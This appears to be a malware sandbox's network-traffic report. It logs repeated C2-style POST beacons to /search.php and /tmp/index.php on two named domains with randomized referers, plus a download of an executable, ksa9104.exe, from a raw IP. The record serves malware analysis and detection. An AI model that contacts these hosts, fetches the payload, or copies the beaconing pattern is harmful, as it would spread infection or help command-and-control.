Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://dqjcshdhfiffhik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ewclkpfbrsdjk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://uiidyxwxtxdyi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://uoltcvkhemeklfe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ncagifvdvfuwwfnn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wwdeekjiqyviexo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://kosstmcfnhuhw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ydofwygotpmmcts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://nojnvrwehyneiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://qnsgnjmmwemj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wehtacgjvfsaxou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://mlgxdfcmbix.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://esxqwevqdpc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jsjqksunoqiwyetj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://imnavngaywaiojfw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jhrmvdleayp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://tcfngkdpgqhcen.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://kskwnlkfffwemep.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wiquilejyybabo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dfddhctvosjupwbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xyqstrniaxmlxodr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fsupncxklgbjs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fcallrcdaowuy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sahyhdmmcvpatde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iqjnmccnpjtfli.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jkxskklaphmdca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gmrribpoppj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fvhbfgwwnuywwuoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wcoutespihad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pmsjsfqrqyrxj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etwlmvbptmw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hytemqketckrb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mgmthbbcemjcwdac.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mclmeggoidfw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ywnrujdiubrl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://llaskwsfjjpffj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nrxoolvtsikko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sjiiqjlirvpxdxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vhprqvsefqk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vtfvgsblgpnxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uxyakrfxevg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tltlkajmdifu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nsllnqutblayn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qqewfcdsrwqbg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pdbldukfsrlj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rgaydglbcbbvar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ticrvurjrjsf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drnoexjyrauki.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wbbiwyhshhf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvjpwlsevsc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vssaauwgvmedfq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pubortabbcvvvfcg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vfyrxdwalbtb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nyhrbrqisswma.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mtigasxvtneuwtdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frgbxqyrenbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ahaddcjrcpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iqyabdaoinn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com
Source: global traffic	DNS traffic detected: DNS query: globalviewsnature.com

Source: unknown

HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://chraqvgclyunxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: calvinandhalls.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:30 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:31 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:53:38 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:54:53 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:55:09 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:55:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:55:44 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 00:56:00 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
